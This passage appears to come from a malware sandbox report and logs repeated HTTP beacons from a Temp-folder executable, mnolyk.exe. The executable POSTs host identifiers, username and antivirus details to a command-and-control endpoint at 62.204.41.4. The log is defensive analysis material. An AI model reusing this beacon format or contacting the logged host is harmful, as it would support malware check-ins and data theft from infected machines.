                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:25.864747047 CET | 425 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      311 | 192.168.2.7 | 50006 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:26.061961889 CET | 426 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:26.126768112 CET | 426 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      312 | 192.168.2.7 | 50007 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:26.308602095 CET | 427 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:26.372323036 CET | 427 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      313 | 192.168.2.7 | 50008 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:26.555660009 CET | 428 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:26.619647980 CET | 428 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      314 | 192.168.2.7 | 50009 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:26.787936926 CET | 429 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:26.851175070 CET | 429 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      315 | 192.168.2.7 | 50010 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:27.035129070 CET | 430 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:27.101217031 CET | 430 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      316 | 192.168.2.7 | 50011 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:27.300770044 CET | 431 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:27.364865065 CET | 431 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      317 | 192.168.2.7 | 50012 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:27.539545059 CET | 432 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:27.603720903 CET | 432 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      318 | 192.168.2.7 | 50013 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:27.775981903 CET | 433 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:27.839906931 CET | 433 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      319 | 192.168.2.7 | 50014 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:28.008248091 CET | 434 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:28.073843002 CET | 434 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      32 | 192.168.2.7 | 49726 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:09.303742886 CET | 136 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:09.365572929 CET | 136 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      320 | 192.168.2.7 | 50015 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:28.258645058 CET | 435 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:28.321769953 CET | 435 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      321 | 192.168.2.7 | 50016 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:28.501580000 CET | 436 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:28.563205957 CET | 436 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      322 | 192.168.2.7 | 50017 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:28.743484974 CET | 437 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:28.806921005 CET | 437 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      323 | 192.168.2.7 | 50018 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:28.986006975 CET | 438 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:29.053009033 CET | 438 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      324 | 192.168.2.7 | 50019 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:29.231062889 CET | 439 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:29.294914961 CET | 439 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      325 | 192.168.2.7 | 50020 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:29.489589930 CET | 440 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:29.554568052 CET | 440 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      326 | 192.168.2.7 | 50021 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:29.768912077 CET | 441 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:29.833816051 CET | 441 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      327 | 192.168.2.7 | 50022 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:30.007206917 CET | 442 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:30.073004961 CET | 442 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      328 | 192.168.2.7 | 50023 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:30.249608994 CET | 443 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
